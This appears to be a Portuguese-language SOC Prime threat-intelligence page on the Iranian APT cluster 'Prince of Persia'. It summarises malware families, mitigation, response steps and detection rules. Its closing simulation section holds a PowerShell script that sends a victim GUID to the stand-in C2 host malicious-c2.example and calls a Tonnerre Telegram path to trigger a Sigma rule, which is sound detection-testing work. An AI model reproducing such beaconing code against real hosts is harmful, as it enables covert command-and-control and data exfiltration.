SOC Prime Bias: Crítico

23 Dec 2025 10:56 UTC

Príncipe da Pérsia: Uma Retrospectiva de 10 Anos de Atividades do APT Iraniano

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Príncipe da Pérsia: Uma Retrospectiva de 10 Anos de Atividades do APT Iraniano
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório perfila o cluster APT ligado ao estado iraniano denominado Príncipe da Pérsia e traça sua progressão ao longo da última década, com ênfase em atividades observadas de 2023 a 2025. Os operadores dependem de famílias de malware personalizadas — incluindo Foudre, Tonnerre, MaxPinner, Rugissement e Deep Freeze — para suportar espionagem e roubo sistemático de dados. Iterações recentes introduzem algoritmos de geração de domínio, comando e controle baseados no Telegram e cargas SFX criptografadas para melhorar a resiliência e o ocultamento. O alvo abrange infraestrutura crítica e redes ligadas a dissidentes em várias regiões.

Investigação

Pesquisadores da SafeBreach seguiram as operações do grupo a partir de 2019, coletando amostras recentes, documentando a arquitetura C2 e analisando a lógica DGA. Eles descriptografaram cargas protegidas, extraíram credenciais de bots do Telegram e construíram uma linha do tempo das variantes lançadas. A pesquisa destaca infraestruturas de produção e teste separadas e detém detalhes de comportamentos de entrega de arquivos ligados a cadeias de infecção conduzidas por Excel. Indicadores de comprometimento foram montados a partir de hashes de malware, domínios e URLs.

Mitigação

Monitore a atividade DNS para os padrões DGA identificados, bloqueie domínios maliciosos conhecidos e restrinja ou inspecione o tráfego relacionado a bots do Telegram. Adicione detecções para os nomes de arquivos de malware mencionados e artefatos DLL de carregamento, e use monitoramento/sinkholing de DNS para expor infraestruturas rotativas. Implemente listas de permissão de aplicativos e fortaleça a segurança do Office limitando macros para reduzir a probabilidade de acesso inicial.

Resposta

Se qualquer indicador for encontrado, coloque o sistema afetado em quarentena, capture provas voláteis e execute forense direcionado em arquivos soltos e caminhos relevantes do registro. Bloqueie todos os domínios e endereços IP associados, gire tokens de bots do Telegram expostos e redefina credenciais para contas impactadas. Procure, em todo o ambiente, por remanescentes de DLL de carregador personalizado e cargas SFX criptografadas para garantir a erradicação completa.

Fluxo de Ataque

Detecções

Possível Abuso do Telegram Como Canal de Comando e Controle (via dns_query)

Equipe SOC Prime
22 Dez 2025

Possível Infiltroção/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)

Equipe SOC Prime
22 Dez 2025

Comando e Controle Suspeito por Solicitação DNS de Domínio de Nível Superior (TLD) Incomum (via dns)

Equipe SOC Prime
22 Dez 2025

Execução de Taskkill Suspeita (via cmdline)

Equipe SOC Prime
22 Dez 2025

IOCs (HashSha256) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio Parte 2

Regras de IA do SOC Prime
22 Dez 2025

IOCs (SourceIP) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio

Regras de IA do SOC Prime
22 Dez 2025

IOCs (HashSha256) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio Parte 1

Regras de IA do SOC Prime
22 Dez 2025

IOCs (HashMd5) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio

Regras de IA do SOC Prime
22 Dez 2025

IOCs (DestinationIP) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio

Regras de IA do SOC Prime
22 Dez 2025

Detecção de Infecção Foudre v34 via Arquivo Excel com Executável Embutido [Criação de Processo no Windows]

Regras de IA do SOC Prime
22 Dez 2025

Detecção de Comunicação C2 de Foudre e Tonnerre [Conexão de Rede no Windows]

Regras de IA do SOC Prime
22 Dez 2025

Execução de Simulação

Pré-requisito: A Verificação de Telemetria & Linha de Base Pré-Voo deve ter sido aprovada.

Racional: Esta seção detalha a execução precisa da técnica do adversário (T1584.005) projetada para acionar a regra de detecção. Os comandos e narrativas DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa & Comandos do Ataque:
    O ator de ameaça provisionou um domínio malicioso malicious-c2.example que hospeda o servidor C2 Foudre/Tonnerre. A carga útil do atacante na máquina da vítima realiza duas solicitações HTTP GET:

    1. Envia o GUID da vítima para o endpoint Foudre C2 usando o caminho /1/?c=<GUID>.
    2. Contata a API do Telegram via backdoor Tonnerre usando o caminho /t/tga.adr.

    Ambas as requisições são feitas via HTTP (para simplificar o registro de proxy) e incluem um User-Agent genérico para mesclar com o tráfego normal. As ações geram os campos exatos (request_method=GET, url contendo as substrings alvo) que a regra Sigma procura.

  • Script de Teste de Regressão:

    # ------------------------------------------------------------
    # Simulação de Comunicação C2 Foudre & Tonnerre (Windows)
    # ------------------------------------------------------------
    
    # 1. Defina o GUID da vítima (em uma infecção real, isso seria lido do registro)
    $guid = (New-Guid).Guid
    
    # 2. Defina o host C2 malicioso (substitua por um endereço que você controle para testes)
    $c2Host = "http://malicious-c2.example"
    
    # 3. Envie GUID para o endpoint Foudre C2
    $foudreUrl = "$c2Host/1/?c=$guid"
    Write-Host "[*] Enviando GUID para Foudre C2: $foudreUrl"
    Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing
    
    # 4. Contate a API do Telegram via backdoor Tonnerre
    $telegramUrl = "$c2Host/t/tga.adr"
    Write-Host "[*] Contatando endpoint da API do Telegram: $telegramUrl"
    Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing
    
    Write-Host "[+] Simulação completa. Verifique o SIEM para alertas."

    O script é autocontido; executá-lo em um host Windows que encaminha tráfego através do proxy configurado produzirá duas entradas de log que correspondem às condições da regra Sigma url|contains condições.

  • Comandos de Limpeza:

    # Remova quaisquer conexões de rede temporárias (só relevante se o proxy criar sessões persistentes)
    # Aqui simplesmente limpamos o cache DNS para evitar a resolução prolongada do host malicioso.
    ipconfig /flushdns
    Write-Host "[*] Limpeza completa."